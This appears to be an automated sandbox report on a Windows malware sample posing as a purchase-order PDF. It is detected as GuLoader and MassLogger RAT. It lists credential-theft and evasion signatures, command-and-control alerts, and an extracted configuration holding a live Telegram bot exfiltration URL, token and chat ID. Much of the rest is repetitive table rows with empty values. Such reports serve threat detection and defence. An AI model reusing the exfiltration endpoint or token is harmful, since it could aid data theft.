Edit tour
Windows
Analysis Report
PURCHASE ORDER TRC-090971819130-24_pdf.exe
Overview
General Information
| Sample name: | PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Analysis ID: | 1578319 |
| MD5: | 745504717878bb22b600df7e2c2dd9f4 |
| SHA1: | 9515d0277803511a4f401674f40f022ed69c85d7 |
| SHA256: | 8a4d38092e7f0245aa376d724cf3dbe08d4b563a86db3c99e70defaa38beb969 |
| Tags: | exeuser-lowmal3 |
| Infos: |  |
 | |
Detection
GuLoader, MassLogger RAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Classification
- System is w10x64
PURCHASE ORDER TRC-090971819130-24_pdf.exe (PID: 1532 cmdline: "C:\Users\ user\Deskt op\PURCHAS E ORDER TR C-09097181 9130-24_pd f.exe" MD5: 745504717878BB22B600DF7E2C2DD9F4) - PURCHASE ORDER TRC-090971819130-24_pdf.exe (PID: 4796 cmdline:
"C:\Users\ user\Deskt op\PURCHAS E ORDER TR C-09097181 9130-24_pd f.exe" MD5: 745504717878BB22B600DF7E2C2DD9F4)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
| JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
| Click to see the 2 entries | ||||
⊘No Sigma rule has matched
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T15:29:42.161159+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49756 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:45.902560+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49766 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:49.397276+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49776 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:52.938425+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49785 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:56.563595+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49796 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:00.031933+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:08.989401+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49827 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:21.477445+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49859 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:25.990535+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49871 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:30.719693+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49883 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:34.215299+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49893 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:37.686699+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:42.399185+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49917 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:45.840863+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49925 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:50.316155+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:53.779170+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49947 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:57.250331+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:31:01.789509+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:31:07.086493+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 149.154.167.220 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T15:29:31.912821+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
| 2024-12-19T15:29:40.006658+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
| 2024-12-19T15:29:43.850430+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49761 | 132.226.247.73 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T15:29:23.912768+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49713 | 216.58.208.238 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
Location Tracking | |
|---|
| Source: | DNS query: | ||
| Source: | Code function: | 3_2_32B3D1EC | |
| Source: | Code function: | 3_2_32B3D9D9 | |
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Static PE information: | ||
| Source: | Code function: | 0_2_00405846 | |
| Source: | Code function: | 0_2_004027FB | |
| Source: | Code function: | 0_2_00406398 | |
| Source: | Code function: | 3_2_00405846 | |
| Source: | Code function: | 3_2_004027FB | |
| Source: | Code function: | 3_2_00406398 | |
| Source: | Code function: | 3_2_32B303AF | |
| Source: | Code function: | 3_2_32B3C638 | |
| Source: | Code function: | 3_2_32B30C28 | |
| Source: | Code function: | 3_2_32B3DA9C | |
| Source: | Code function: | 3_2_32B3EBF7 | |
| Source: | Code function: | 3_2_32B3E339 | |
| Source: | Code function: | 3_2_32B3B07F | |
| Source: | Code function: | 3_2_32B3F042 | |
| Source: | Code function: | 3_2_32B3C1E0 | |
| Source: | Code function: | 3_2_32B3B930 | |
| Source: | Code function: | 3_2_32B3DEE1 | |
| Source: | Code function: | 3_2_32B3E79F | |
| Source: | Code function: | 3_2_32B30F6F | |
| Source: | Code function: | 3_2_32B3B4EC | |
| Source: | Code function: | 3_2_32B30C1A | |
| Source: | Code function: | 3_2_32B3BD88 | |
| Source: | Code function: | 3_2_3593BDF0 | |
| Source: | Code function: | 3_2_35938650 | |
| Source: | Code function: | 3_2_35938650 | |
| Source: | Code function: | 3_2_35934DB0 | |
| Source: | Code function: | 3_2_35932560 | |
| Source: | Code function: | 3_2_35931CB0 | |
| Source: | Code function: | 3_2_359374C8 | |
| Source: | Code function: | 3_2_35936C18 | |
| Source: | Code function: | 3_2_35931400 | |
| Source: | Code function: | 3_2_35930FA8 | |
| Source: | Code function: | 3_2_359367C0 | |
| Source: | Code function: | 3_2_35935F10 | |
| Source: | Code function: | 3_2_35933F70 | |
| Source: | Code function: | 3_2_359336C0 | |
| Source: | Code function: | 3_2_35932E10 | |
| Source: | Code function: | 3_2_35935660 | |
| Source: | Code function: | 3_2_35938193 | |
| Source: | Code function: | 3_2_359329B8 | |
| Source: | Code function: | 3_2_35932108 | |
| Source: | Code function: | 3_2_3593C92F | |
| Source: | Code function: | 3_2_35934820 | |
| Source: | Code function: | 3_2_35931858 | |
| Source: | Code function: | 3_2_35937070 | |
| Source: | Code function: | 3_2_359343C8 | |
| Source: | Code function: | 3_2_3593CBE7 | |
| Source: | Code function: | 3_2_35933B18 | |
| Source: | Code function: | 3_2_35937B52 | |
| Source: | Code function: | 3_2_35938373 | |
| Source: | Code function: | 3_2_35936368 | |
| Source: | Code function: | 3_2_35935AB8 | |
| Source: | Code function: | 3_2_35935208 | |
| Source: | Code function: | 3_2_35933268 | |
| Source: | Code function: | 3_2_35E6E7C8 | |
| Source: | Code function: | 3_2_35E6F5D8 | |
| Source: | Code function: | 3_2_35E6F316 | |
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | JA3 fingerprint: | ||
| Source: | JA3 fingerprint: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Code function: | 0_2_004052F3 | |
System Summary | |
|---|
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static file information: | ||
| Source: | Code function: | 0_2_004032A0 | |
| Source: | Code function: | 3_2_004032A0 | |
| Source: | Code function: | 0_2_00404B30 | |
| Source: | Code function: | 0_2_00407041 | |
| Source: | Code function: | 0_2_0040686A | |
| Source: | Code function: | 3_2_00407041 | |
| Source: | Code function: | 3_2_0040686A | |
| Source: | Code function: | 3_2_00404B30 | |
| Source: | Code function: | 3_2_00154328 | |
| Source: | Code function: | 3_2_00158DA0 | |
| Source: | Code function: | 3_2_00155968 | |
| Source: | Code function: | 3_2_00155F90 | |
| Source: | Code function: | 3_2_00152DD1 | |
| Source: | Code function: | 3_2_32B303AF | |
| Source: | Code function: | 3_2_32B35328 | |
| Source: | Code function: | 3_2_32B3331A | |
| Source: | Code function: | 3_2_32B3C638 | |
| Source: | Code function: | 3_2_32B37628 | |
| Source: | Code function: | 3_2_32B3CCA0 | |
| Source: | Code function: | 3_2_32B3DA9C | |
| Source: | Code function: | 3_2_32B3AAEA | |
| Source: | Code function: | 3_2_32B3EBF7 | |
| Source: | Code function: | 3_2_32B3E339 | |
| Source: | Code function: | 3_2_32B36B01 | |
| Source: | Code function: | 3_2_32B3B07F | |
| Source: | Code function: | 3_2_32B3F042 | |
| Source: | Code function: | 3_2_32B37848 | |
| Source: | Code function: | 3_2_32B3C1E0 | |
| Source: | Code function: | 3_2_32B3B930 | |
| Source: | Code function: | 3_2_32B36EA0 | |
| Source: | Code function: | 3_2_32B3DEE1 | |
| Source: | Code function: | 3_2_32B3E79F | |
| Source: | Code function: | 3_2_32B3A733 | |
| Source: | Code function: | 3_2_32B3CC91 | |
| Source: | Code function: | 3_2_32B3B4EC | |
| Source: | Code function: | 3_2_32B3BD88 | |
| Source: | Code function: | 3_2_3593BDF0 | |
| Source: | Code function: | 3_2_35939D10 | |
| Source: | Code function: | 3_2_359396C8 | |
| Source: | Code function: | 3_2_35938650 | |
| Source: | Code function: | 3_2_3593A9B0 | |
| Source: | Code function: | 3_2_3593A360 | |
| Source: | Code function: | 3_2_3593BA99 | |
| Source: | Code function: | 3_2_35934DB2 | |
| Source: | Code function: | 3_2_35934DB0 | |
| Source: | Code function: | 3_2_3593BDE9 | |
| Source: | Code function: | 3_2_35939D00 | |
| Source: | Code function: | 3_2_35939D04 | |
| Source: | Code function: | 3_2_35939D0D | |
| Source: | Code function: | 3_2_35932550 | |
| Source: | Code function: | 3_2_35932560 | |
| Source: | Code function: | 3_2_35931CB0 | |
| Source: | Code function: | 3_2_35931CA0 | |
| Source: | Code function: | 3_2_359374C4 | |
| Source: | Code function: | 3_2_359374C8 | |
| Source: | Code function: | 3_2_35936C18 | |
| Source: | Code function: | 3_2_35931400 | |
| Source: | Code function: | 3_2_359367B0 | |
| Source: | Code function: | 3_2_359367BC | |
| Source: | Code function: | 3_2_35930FA8 | |
| Source: | Code function: | 3_2_359367C0 | |
| Source: | Code function: | 3_2_3593AFF8 | |
| Source: | Code function: | 3_2_35935F10 | |
| Source: | Code function: | 3_2_35933F70 | |
| Source: | Code function: | 3_2_35933F60 | |
| Source: | Code function: | 3_2_359336B0 | |
| Source: | Code function: | 3_2_359396B8 | |
| Source: | Code function: | 3_2_359336C0 | |
| Source: | Code function: | 3_2_359396C4 | |
| Source: | Code function: | 3_2_35932E10 | |
| Source: | Code function: | 3_2_3593565F | |
| Source: | Code function: | 3_2_35938642 | |
| Source: | Code function: | 3_2_35938647 | |
| Source: | Code function: | 3_2_3593864C | |
| Source: | Code function: | 3_2_35935660 | |
| Source: | Code function: | 3_2_359329B8 | |
| Source: | Code function: | 3_2_3593A9A9 | |
| Source: | Code function: | 3_2_359329A8 | |
| Source: | Code function: | 3_2_359351F8 | |
| Source: | Code function: | 3_2_35932108 | |
| Source: | Code function: | 3_2_3593F130 | |
| Source: | Code function: | 3_2_3593F129 | |
| Source: | Code function: | 3_2_359320F8 | |
| Source: | Code function: | 3_2_3593481C | |
| Source: | Code function: | 3_2_35930036 | |
| Source: | Code function: | 3_2_35934820 | |
| Source: | Code function: | 3_2_35931858 | |
| Source: | Code function: | 3_2_35930040 | |
| Source: | Code function: | 3_2_35937070 | |
| Source: | Code function: | 3_2_359343B9 | |
| Source: | Code function: | 3_2_359343C8 | |
| Source: | Code function: | 3_2_359313F0 | |
| Source: | Code function: | 3_2_35933B18 | |
| Source: | Code function: | 3_2_35933B08 | |
| Source: | Code function: | 3_2_35937B52 | |
| Source: | Code function: | 3_2_3593A351 | |
| Source: | Code function: | 3_2_3593A35C | |
| Source: | Code function: | 3_2_35937B62 | |
| Source: | Code function: | 3_2_35936364 | |
| Source: | Code function: | 3_2_35936368 | |
| Source: | Code function: | 3_2_35935AB4 | |
| Source: | Code function: | 3_2_35935AB8 | |
| Source: | Code function: | 3_2_35935207 | |
| Source: | Code function: | 3_2_35935208 | |
| Source: | Code function: | 3_2_35933258 | |
| Source: | Code function: | 3_2_35933268 | |
| Source: | Code function: | 3_2_35E6E7C8 | |
| Source: | Code function: | 3_2_35E6D608 | |
| Source: | Code function: | 3_2_35E68328 | |
| Source: | Code function: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Static PE information: | ||
| Source: | Classification label: | ||
| Source: | Code function: | 0_2_004032A0 | |
| Source: | Code function: | 3_2_004032A0 | |
| Source: | Code function: | 0_2_004045B4 | |
| Source: | Code function: | 0_2_00402095 | |
| Source: | File created: | Jump to behavior | ||
| Source: | Mutant created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | ReversingLabs: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | LNK file: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Static PE information: | ||
Data Obfuscation | |
|---|
| Source: | File source: | ||
| Source: | Code function: | 0_2_10001B18 | |
| Source: | Code function: | 0_2_10002E0E | |
| Source: | File created: | Jump to dropped file | ||
| Source: | Registry key monitored for changes: | Jump to behavior | ||
| Source: | Registry key monitored for changes: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
